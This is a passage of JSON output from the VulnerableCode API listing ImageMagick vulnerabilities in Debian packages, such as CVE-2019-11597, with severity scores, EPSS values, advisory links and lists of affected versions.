"VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2022-32547" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vrqg-4fke-mfay" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82582?format=api", "vulnerability_id": "VCID-wpsv-h9q7-pyep", "summary": "ImageMagick: heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c leading to DoS or information disclosure", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-11597.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-11597.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44703", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44783", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44804", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44743", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44796", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44798", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44815", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44784", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44786", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44839", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44832", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44763", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00222", "scoring_system": "epss", "scoring_elements": "0.44681", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1705406", "reference_id": "1705406", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1705406" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=928207", "reference_id": "928207", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=928207" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4034-1/", "reference_id": "USN-4034-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4034-1/" }, { "reference_url": "https://usn.ubuntu.com/6985-1/", "reference_id": "USN-6985-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6985-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-11597" ], "risk_score": 3.6, "exploitability": "0.5", "weighted_severity": "7.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wpsv-h9q7-pyep" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81209?format=api", "vulnerability_id": "VCID-wwcs-2mw8-4bbr", "summary": "ImageMagick: heap-based buffer over-read in BlobToStringInfo in MagickCore/string.c during TIFF image decoding", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-13902.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-13902.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-13902", "reference_id": "", "reference_type": "", "scores": [ { 